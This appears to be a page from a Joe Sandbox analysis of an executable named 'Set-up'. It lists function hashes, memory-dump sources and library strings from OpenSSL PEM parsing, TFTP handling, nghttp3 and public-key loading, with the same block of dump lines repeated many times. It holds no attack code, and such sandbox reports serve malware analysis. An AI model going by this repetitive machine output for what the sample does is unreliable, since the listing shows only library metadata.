Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: 29d6fd6587c55de24b59605cd17e4397b6ef3519eaf21e4156adf66734356557
Instruction ID: 2923d8beacc9b6d9c158cd3e24c1642f6a7cb02b5f2217c12e0a9bcf4570caad
Opcode Fuzzy Hash: 29d6fd6587c55de24b59605cd17e4397b6ef3519eaf21e4156adf66734356557
Instruction Fuzzy Hash: 15C10671914B418BD722DF38C881BE6F7E1BF99304F209A1DE9EEA6241EB707584CB51

Function 011066B0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
Instruction ID: e962719ce41088293ec993e04fa43b6996ba495dde8eaf6a00b2ff5d13d5ef5a
Opcode Fuzzy Hash: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
Instruction Fuzzy Hash: 1B719F71B0470A9FD719DE2DC4C0A2AB7E1BF88714F49462CEA56CB395E770E921CB81

Function 01126730 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 7a6ebec8d3c80e30383364310c880b149e7e0a6a0e78bfd8991e7a3e8a249d9b
Instruction ID: 11a5d1763eced45515c40fce7782e563e2854f527dfccec008f95449f6a91da3
Opcode Fuzzy Hash: 7a6ebec8d3c80e30383364310c880b149e7e0a6a0e78bfd8991e7a3e8a249d9b
Instruction Fuzzy Hash: C0810972D14BD28BD3198F28C8906B6BBA0FFDA310F149B1EEDE606782E7749590C741

Function 011285A0 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction ID: 12da370c40af87bf8c4523c5a84680b8d470b4ee2592541fd23ca50abd3d91e9
Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction Fuzzy Hash: 7C71E1752042268BC71D9F6CE5D4169FBE1BF88310F19CB6DDA998B342D334E8A5CB81

Function 00F34170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction ID: d4697429b944f5d6c5b2297b35db6b3e7a24340ddfee3c597e64706b65b4b360
Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction Fuzzy Hash: 9E51F472B093414BD7149E5C98802AEB7D1FB9A334F29477CD49A9B352C224FC46E791

Function 0113A610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction ID: c0371cfe3455e69ee382e59c9557f2af81752ff2d04dd2fb87057e284737af2c
Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction Fuzzy Hash: A5518D76A08A258BC71A8F19D1D0029FBE2BFC8204F16C66DD9DAA7745C330AD64CBC1

Function 0114A000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: 9b4a71d871703d49df0f807cfd2099c0570c8538a7f767c420ff7e4744b0822c
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: D531D8353483194BD718ED6DE4D022AF6D39FD8A60F56C63CE586C3381EB718C488781

Function 00FB84A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00FB85B6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 00FB85CC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 00FB85E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 00FB85F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 00FB860A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00FB8620
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00FB8634
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 00FB864A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 00FB865C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00FB8672
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00FB86A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00FB86BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 00FB86D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00FB86E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00FB86FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00FB8712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00FB872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00FB8686

Part of subcall function 00F9CBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00F77254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00F740BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F9CBD2

Strings

PARAMETERS, xrefs: 00FB85DC, 00FB87FB
PKCS7, xrefs: 00FB86B4, 00FB86DC, 00FB870C
NEW CERTIFICATE REQUEST, xrefs: 00FB8644
CERTIFICATE REQUEST, xrefs: 00FB8656
X509 CERTIFICATE, xrefs: 00FB861A
Expecting: , xrefs: 00FB8908
PKCS #7 SIGNED DATA, xrefs: 00FB86CA
DH PARAMETERS, xrefs: 00FB8604
PRIVATE KEY, xrefs: 00FB8756, 00FB8787
ANY PRIVATE KEY, xrefs: 00FB85C6
CMS, xrefs: 00FB86F6, 00FB8724
X9.42 DH PARAMETERS, xrefs: 00FB85F2
TRUSTED CERTIFICATE, xrefs: 00FB8680, 00FB869A
CERTIFICATE, xrefs: 00FB862E, 00FB866C
ENCRYPTED PRIVATE KEY, xrefs: 00FB8740
crypto/pem/pem_lib.c, xrefs: 00FB84F6, 00FB8509, 00FB851F, 00FB8545, 00FB855A, 00FB8572, 00FB88CE, 00FB8935, 00FB8948, 00FB895F, 00FB8977, 00FB898C, 00FB89A5, 00FB89CB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: 620dc694540a71f3dfc9620ad8e423057f19522f213dd6d4e01d635c386b2d03
Instruction ID: c597cf83f715758635f63c8634b6578da50cf76e294308cc97aa8cfbd035720c
Opcode Fuzzy Hash: 620dc694540a71f3dfc9620ad8e423057f19522f213dd6d4e01d635c386b2d03
Instruction Fuzzy Hash: 5BB13AB5E443026BEA1079629C03BEB329C5FF1BDEF18042CF944A1192FF75D516E962

Function 00E32010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E3204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E32068
WSAGetLastError.WS2_32 ref: 00E320DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 00E3214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00E32365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00E3238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E323B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E3241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E324AD

Strings

requested, xrefs: 00E3232C
invalid tsize -:%s:- value in OACK packet, xrefs: 00E32573
blksize, xrefs: 00E323FC
blksize parsed from OACK, xrefs: 00E32332
tsize, xrefs: 00E3248D
%s (%ld), xrefs: 00E324D8, 00E32557
invalid blocksize value in OACK packet, xrefs: 00E3251F
Internal error: Unexpected packet, xrefs: 00E322C4
got option=(%s) value=(%s), xrefs: 00E323E8
TFTP error: %s, xrefs: 00E3228B
tsize parsed from OACK, xrefs: 00E324D3
server requested blksize larger than allocated, xrefs: 00E32552
blksize is larger than max supported, xrefs: 00E3253C
Received too short packet, xrefs: 00E32169
%s (%d), xrefs: 00E3254A
blksize is smaller than min supported, xrefs: 00E32545
%s (%d) %s (%d), xrefs: 00E32337
Malformed ACK packet, rejecting, xrefs: 00E32514

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: 33697903481a1526608ff42226006a9cffbfe95354e5ebfba5e4df49f86b3999
Instruction ID: ce90aeeda07402952969781587f24ffed1a2aa3c345dc5e3e3023a10a5a5a1c6
Opcode Fuzzy Hash: 33697903481a1526608ff42226006a9cffbfe95354e5ebfba5e4df49f86b3999
Instruction Fuzzy Hash: 8EE12AB1A04302ABD7109F24DC49B6BBBE5EF94718F04542DFA99B7392E774E900C792

Function 00E6A140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00E6A29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 00E6A2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00E6A2E3

Part of subcall function 00E6A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00E6A5FC

Strings

rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00E6A551
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 00E6A4D3
nghttp3_ksl.c, xrefs: 00E6A4CE, 00E6A4E3, 00E6A4F8, 00E6A50D, 00E6A522, 00E6A537, 00E6A54C, 00E6A561, 00E6A576, 00E6A58B
n > 0, xrefs: 00E6A53C, 00E6A57B
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00E6A512
i > 0, xrefs: 00E6A4E8, 00E6A590
i < blk->n - 1, xrefs: 00E6A4FD
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00E6A566
lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00E6A527

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: 455eb9f483e4f6dca1aba3d82781d039c191fa22dc6ce58f6ed01babcaf63096
Instruction ID: fbc740ca5bc89046a1e063a63067af06d966a481780bee9e772c5222622a1d58
Opcode Fuzzy Hash: 455eb9f483e4f6dca1aba3d82781d039c191fa22dc6ce58f6ed01babcaf63096
Instruction Fuzzy Hash: 06C10071A403059FC714DF08D88596EB7A5FF98748F18952DE85AAB392E770ED80CF82

Function 00EB4080 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 190fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,013ED255), ref: 00EB4094
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB40A3
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB40B0
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 00EB40D6
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB40F4
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB4101
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB410F
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 00EB413F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB414C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00EB4165
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB4186
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00EB41A0
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 00EB41BA
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 00EB41E4

Strings

Unable to open public key file, xrefs: 00EB40BA
Unable to read public key from file, xrefs: 00EB41A8
Invalid key data, not base64 encoded, xrefs: 00EB4214
Missing public key data, xrefs: 00EB417E
Invalid data in public key file, xrefs: 00EB4117
Invalid public key data, xrefs: 00EB422E
Unable to allocate memory for public key data, xrefs: 00EB418E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

